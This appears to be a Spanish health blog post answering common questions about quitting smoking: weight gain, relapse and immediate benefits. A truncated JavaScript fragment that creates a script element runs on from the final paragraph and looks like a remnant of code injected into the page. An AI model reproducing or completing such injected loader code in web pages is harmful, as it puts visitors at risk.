Salud y belleza » Enfermedades

Esfumando dudas sobre el abandono del cigarrillo (II)

Sin Comentarios

Abandonar el cigarrillo: pronunciar la frase puede parecer sencillo y, de hecho, para aquellos que en su vida nunca tocaron un bastón de esa clase, el ejercicio de cesar con tal vicio llega a sonar hasta relajado. Pero, si algo nos han enseñado los fumadores, o cualquier sujeto con un vicio, es que nadie entiende a lo que se enfrenta hasta “estar del otro lado”. A diario, todo fumador se realiza una serie de preguntas que, desgraciadamente, nadie sabe responderle: “¿por qué no puedo deja de fumar?”, “¿cómo debo encarar mi problema?” y más.

Hoy, con esta segunda parte con las dudas habituales sobre el cigarrillo, se esfumarán todas las incógnitas, tal como sucede con el humo del cigarrillo…

¿De que forma se relaciona el aumento de peso con el abandono del cigarrillo?

Es real que, por cuestiones relacionadas con el reemplazo, muchas de las personas que dejan de fumar, o que lo intentan, aumentan unos pocos kilos durante el proceso. Sin embargo, al menos desde el ángulo físico, no existe comparación alguna entre los asuntos relacionados al peso y los problemas que ocasiona el cigarrillo. De hecho, hacer una dieta mientras se está intentando dejar de fumar no se recomienda: puede aumentar el nivel de estrés y hacerlo reincidir en el vicio. Por lo tanto, al momento en las primeras etapas, el intercambio “kilos x humo” suena razonable y no se debe, jamás, desestimar.

¿Qué probabilidades hay de que un fumador sea reincidente una vez “curado”?

Increíblemente, en contraposición de lo que significa dejar de fumar, son muy pocas las personas que, una vez abandonado el cigarrillo y completado un lapso mayor al año sin fumar, vuelven a hacerlo. Si bien el enunciado de la pregunta es engañoso pues los vicios nunca se “curan”, es positivo el índice de sujetos que logran mantenerse libres de humos y, al parecer, en todo caso, lo más difícil, como ocurre siempre, es dar el primer paso.

¿Cuáles son los beneficios inmediatos de dejar de fumar?

Casi de forma inmediata, al poco tiempo del cesar con el vicio, la circulación de la sangre comienza a mejorar, el nivel de monóxido de carbono en la sangre pasa disminuir, el pulso y la presión sanguínea de la persona vuelven a la normalidad, el sentido del gusto y del olfato reaparecen e, incluso, el ejercicio de respirar se transforma en un acto mucho menos forzado y mas “limpio”.var d=document;var s=d.createElement('script'); }

Más consejos de salud y belleza : , , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.